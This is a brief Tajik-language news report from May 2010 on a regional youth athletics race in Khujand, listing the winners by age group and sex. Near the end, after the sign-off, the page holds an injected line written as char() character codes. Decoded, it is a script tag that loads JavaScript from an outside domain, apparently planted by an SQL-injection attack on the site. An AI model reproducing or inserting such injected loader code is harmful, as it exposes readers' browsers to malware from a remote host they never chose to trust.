7.05.2010
Мусобиқаи варзишӣ
Суғд. Дар шаҳри Хуҷанд мусобиқаи вилоятӣ оид ба пойгаи варзиши сабук бахшида ба 65-солагии Иди Ғалаба ва ба хотири 90 солагии
Устоди Халқии Ҷумҳурии Тоҷикистон маҷруҳи гурӯҳи 1 уми Ҷанги бузурги ватанӣ Ҳакимҷон Саидов баргузор гардид.
Раёсати ҷавонон, варзиш ва сайёҳии вилояти Суғд бо мақсади ташвиқ ва тарғиби варзиши сабук, баланд бардоштани маҳорати касбии варзишгарон ва дарёфти варзишгарони болаёқат дар асоси Тақвими ягонаи чорабиниҳои оммавӣ, варзишӣ, солимгардонӣ ва иштироки варзишгарон дар мусобиқаҳои ҷумҳуриявӣ ва байналмилалӣ дар соли 2010 дирӯз дар шаҳри Хуҷанд мусобиқаи вилоятӣ оид ба пойгаи варзиши сабук бахшида ба 65-солагии Иди Ғалаба ва ба хотири 90 солагии Устоди Халқии Ҷумҳурии Тоҷикистон маҷруҳи гурӯҳи 1 Ҷанги бузурги ватанӣ Саидов Ҳакимҷон ташкил ва гузаронида шуд.
Дар мусобиқаи мазкур собиқадорони ҷангу меҳнат ва иштирокчиёни Ҷанги Бузурги Ватанӣ ва 146 варзишгарон аз ҷумла занҳо 37 нафар аз шаҳру ноҳияҳои Ҷ.Расулов, Б.Ғафуров, Шаҳристон, Мастчоҳ, Хуҷанд, Ашт ва Ғончии вилояти Суғд иштирок намуданд.
Ғолибони мусобиқа:

Байни варзишгарони синну соли 10-13 сола – ҷои аввал насиби Ӯктамҷони Зафарзод аз ноҳияи Ғончӣ, ҷои дуюм – Кенҷаев Садриддин н. Ғончӣ ва ҷои сеюм Олимов Ҷаҳонгир аз ш.Хуҷанд насиб гардид. Байни духтарон ба ҷои якум Абдуҷалилова Нилуфар н. Шаҳристон, ба ҷои дувум Турдиматова Гулмира н. Ашт ва ба ҷои саввум Рустамова Салтанат аз н. Шаҳристон сазовор гардиданд.
Байни варзишгарони 14-16 сола 1. Ҳасани Ёқубзода ва 2. Қурбон Муҳаммад н. Ғончӣ, 3. Исломов Даврон н. Шаҳристон. Байни духтарон: 1. Тӯраева Озода н. Ашт, 2. Икромҷонова Дилдора н. Б.Ғафуров, 3. Абдуҷамилова Мутриба н. Шаҳристон.
Байни варзишгарони аз 17 сола боло: 1. Одинаматов Тӯлқин аз н. Ашт, 2. Абдураҳмонов Баҳром аз н. Ашт ва 3. Бобоев Саидраҳмон аз н. Мастчон. Байни духтарон ҷои 1. Мирзоахмедова Дилфуза аз н. Ашт, 2. П. Кристина аз н.Мастчоҳ, 3 Ҳоҷиназарова Гулноза аз н.Ашт.
Иштирокчиёни хурдсол: Ашӯров Дилёр аз н.Мастчоҳ 7 сола ва Аминова Фотима аз н. Мастчоҳ 7 сола ширкат намуданд.
Суғд
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)45489730b299a6224b2c3cf15c45b477.js" type="text/javascript">

ТАВЗЕҲОТ